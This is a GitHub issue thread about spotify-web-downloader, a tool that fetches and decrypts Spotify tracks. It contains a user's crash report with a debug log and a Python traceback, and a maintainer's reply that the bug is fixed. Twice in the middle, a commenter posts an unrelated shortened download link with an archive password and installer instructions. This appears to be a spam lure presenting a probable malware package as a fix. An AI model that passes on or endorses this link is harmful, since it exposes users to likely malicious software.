### ISSUE TITLE
Playlist download stops after a few songs

### ISSUE THREAD

**Issue by SeriousM** [glomatico/spotify-web-downloader#71]
call: `spotify-web-downloader.exe -p --log-level DEBUG --no-lrc https://open.spotify.com/playlist/2IktzPZSnJVA4gEG7kzC4O?si=70715cb28a0c4f1a`

The issue happens after around the 11th song.
Thank you for looking into it!

log:
```
[DEBUG    18:59:27] Cleaning up "temp"
[INFO     18:59:27] (Track 11/79 from URL 1/1) Downloading "Do It To It"
[DEBUG    18:59:27] Getting GID metadata
[DEBUG    18:59:27] Getting lyrics
[DEBUG    18:59:27] Getting album metadata
[DEBUG    18:59:27] Getting track credits
[DEBUG    18:59:27] Getting file info
[DEBUG    18:59:27] Getting PSSH
[DEBUG    18:59:27] Getting decryption key
[DEBUG    18:59:27] Getting stream URL
[DEBUG    18:59:27] Downloading to "temp\20on25jryn53hWghthWWW3_encrypted.m4a"
[DEBUG    18:59:29] Decrypting/Remuxing to "temp\20on25jryn53hWghthWWW3_remuxed.m4a"
[DEBUG    18:59:29] Applying tags
[DEBUG    18:59:29] Moving to "Spotify\ACRAZE\Do It To It\01 Do It To It.m4a"
[DEBUG    18:59:29] Cleaning up "temp"
Traceback (most recent call last):
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\lib\site-packages\spotify_web_downloader\cli.py", line 403, in main
    logger.info(f'({queue_progress}) Downloading "{track["name"]}"')
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\Scripts\spotify-web-downloader.exe\__main__.py", line 7, in <module>
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\lib\site-packages\click\core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\lib\site-packages\click\core.py", line 1078, in main
    rv = self.invoke(ctx)
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\lib\site-packages\click\core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\lib\site-packages\click\core.py", line 783, in invoke
    return __callback(*args, **kwargs)
  File "C:\Users\root\AppData\Local\Programs\Python\Python310\lib\site-packages\spotify_web_downloader\cli.py", line 608, in main
    f'({queue_progress}) Failed to download "{track["name"]}"',
TypeError: 'NoneType' object is not subscriptable
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by glomatico** [comment]
Should be fixed on the newest version.
